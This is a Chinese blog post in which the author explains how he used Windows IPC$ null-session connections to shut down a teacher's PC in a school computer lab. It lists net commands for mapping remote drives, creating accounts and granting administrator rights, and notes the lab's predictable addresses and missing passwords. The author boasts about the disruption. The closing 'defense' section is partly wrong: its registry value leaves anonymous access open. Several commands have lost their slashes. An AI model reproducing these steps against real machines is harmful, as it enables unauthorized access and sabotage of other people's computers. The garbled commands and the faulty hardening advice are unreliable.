当前位置:首页 > 默认文章 > 我是如何通过IPC连接关掉老师电脑的

我是如何通过IPC连接关掉老师电脑的

思远1年前 (2021-03-26)默认文章2145

挺久没更新了,今天来更新一篇IPC连接操作,为了这篇文章我差点没嗝屁

首先,IPC连接命令直接贴给你们了


net use ipipc$ user 建立IPC空链接

 

net use ipipc$ 密码 user用户名 建立IPC非空链接

 

net use h ipc$ 密码 user用户名 直接登陆后映射对方C:到本地为H

 

net use h ipc$ 登陆后映射对方C:到本地为H

 

net use ipipc$ del 删除IPC链接

 

net use h del 删除映射对方到本地的为H的映射

 

net user 用户名 密码 add 建立用户

 

net user guest activeyes 激活guest用户

 

net user 查看有哪些用户

 

net user 帐户名 查看帐户的属性

 

net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

 

net start 查看开启了哪些服务

 

net start 服务名  开启服务;(如net start telnet, net start schedule)

 

net stop 服务名 停止某服务

 

net time 目标ip 查看对方时间

 

net time 目标ip set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数yes可取消确认信息

 

net view 查看本地局域网内开启了哪些共享

 

net view ip 查看对方局域网内开启了哪些共享

 

net config 显示系统网络设置

 

net logoff 断开连接的共享

 

net pause 服务名 暂停某服务

 

net send ip 文本信息 向对方发信息

 

net ver 局域网内正在使用的网络连接类型和信息

 

net share 查看本地开启的共享

 

net share ipc$ 开启ipc$共享

 

net share ipc$ del 删除ipc$共享

 

net share c$ del 删除C:共享


然后开始我们的行动【滑稽】


因为电脑室电脑有极域电子教室,所以开着ipc,也可以用net share命令来看看



我们可以看到有个IPC的服务,这时候就来

net use \\IP\ipc$ "密码" /user:用户名

(这里面IP代表要连接到的电脑IP,密码 表示要连接到的电脑密码,用户名 表示要连接到的电脑名称

如果不知道电脑名称的话就用net view来看看

我这里就不看了,极域电子教室下都是STU+编号,如STU27

IP的话也有规律,192.168.0.1+编号,如192.168.0.127

密码的话是没有的

那么这就很NICE

连接试试

(此处暂时不贴图)

连接后我们就可以直接远程关机,如命令

shutdown -m \\%ip% -s -t 0

%ip%代表要连接到的电脑IP

然后就妙了,老师一脸懵,同学一阵欢呼



其实IPC连接不仅仅是只有这个功能,可以搞个极域电子教室玩玩,看看里面有什么功能你就会知道IPC有多么的有用



防护篇

如何关闭IPC空密码连接呢(电脑没有密码就连接不到你)

粘贴到记事本后缀名改成bat运行

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous" /v "RestrictAnonymous" /d 00000000 /t REG_dword /f

修改注册表策略

还可以关闭139,445端口

同样是bat文件运行

%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
@echo off 
color 1f 
title 关闭135 445 端口
echo. 
echo. 
echo. 
echo 正在关闭135端口 请稍候… 
netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135,137,138,139
echo. 
netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135,137,138,139
echo. 
echo 正在关闭445端口 请稍候… 
netsh advfirewall firewall add rule name = "Disable port 445 - TCP" dir = in action = block protocol = TCP localport = 445
echo. 
netsh advfirewall firewall add rule name = "Disable port 445 - UDP" dir = in action = block protocol = UDP localport = 445
echo.
echo 按任意键退出 
pause>nul

这个时候就可以了

     您阅读本篇文章共花了: 

    扫描二维码推送至手机访问。

    版权声明:本文由勤奋的思远发布,如需转载请注明出处。

    如果文章对你有帮助的话就赞助一下吧https://lsybk.xyz/donation.html

    本文链接:https://lsybk.xyz/post/173.html

    标签: 系统安全
    分享给朋友:

    相关文章

    【记录】创建密码重置盘的时候,系统都做了些什么

    【记录】创建密码重置盘的时候,系统都做了些什么

    创建密码重置盘的时候,系统都做了些什么注:本文作为一篇研究报告,转自网络,查看后续请点击此处。“密码重置盘”是从Windows XP开始即加入Windows系统,并且一直保留至今的一项功能。其目的是在...

    【教程】赞助平台的建成步骤

    【教程】赞助平台的建成步骤

    前言大家看到这篇文章的人应该都知道,现在上线了这个赞助平台,简称“要饭网”那这个是如何建成的呢?幸好作业不多,我弄了一晚上其实之前搞过一个,但是跟这个版本不一样,用的是爱支付接口,玩了一下,手续费太多...

    【闲谈】为什么朋友说加了cdn不仅没变快反而慢了

    【闲谈】为什么朋友说加了cdn不仅没变快反而慢了

    朋友之前跟我诉苦为什么他的站加了彩虹云cdn不仅没快反而慢了,我也是困惑不已,直到今天...了解一下cdn什么是cdn呢?问一下我们可亲可敬的度娘吧好吧,跳转到搜狗了,这里可以看到,它只服务于静态网页...

    SQL手注时绕waf的十一种方法

    SQL手注时绕waf的十一种方法

    带大家了解一下SQL时过waf的小方法1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字...

    sqlmap各项参数介绍

    sqlmap各项参数介绍

    教程说明学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】针对sqlmap注...

    神奇的burp之注册

    神奇的burp之注册

    这篇文章就来教一下burp的注册与使用burp是什么呢?BurpSuite是一款信息安全从业人员必备的集成型的渗透测试神器,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scann...

    评论列表

    发表评论

    访客

    看不清,换一张

    ◎欢迎参与讨论,请在这里发表您的看法和观点。